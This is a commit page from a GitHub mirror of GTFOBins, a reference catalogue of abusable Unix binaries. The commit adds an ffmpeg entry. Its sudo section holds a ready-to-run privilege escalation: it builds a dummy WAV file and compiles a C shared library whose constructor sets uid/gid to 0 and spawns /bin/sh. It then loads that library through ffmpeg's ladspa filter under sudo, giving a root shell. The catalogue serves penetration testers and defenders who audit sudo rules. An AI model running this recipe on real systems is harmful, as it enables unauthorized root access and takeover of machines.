mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-27 18:51:41 +01:00
Code Issues

Merge 4f594274ca5bbe56ec045c028712c787ae30d6a0 into b29f2cfde1c72e4ea5191e49604e923bbda98461

Browse Source
This commit is contained in:
Frissi0n 2025-09-23 18:36:51 -05:00 committed by GitHub
commit 90960c8ea4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
_gtfobins/ffmpeg.md Normal file
View File

@ -0,0 +1,10 @@
---
functions:
sudo:
- description: The ladspa filter loads external plugins for audio processing. Load a malicious shared library to execute code and get a shell.
code: |
TD=$(mktemp -d)
printf "\x52\x49\x46\x46\x24\x00\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x22\x56\x00\x00\x01\x00\x08\x00\x64\x61\x74\x61\x00\x00\x00\x00" > "$TD/any.wav"
echo -e '#include <unistd.h>\n#include <stdlib.h>\n__attribute__((constructor)) static void setup(void) {\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh -c reset");\nsystem("/bin/sh");\n}' | gcc -x c -shared -fPIC -o $TD/libgtfo.so -
sudo ffmpeg -i $TD/any.wav -af "ladspa=file=$TD/libgtfo.so" -f null a.wav
---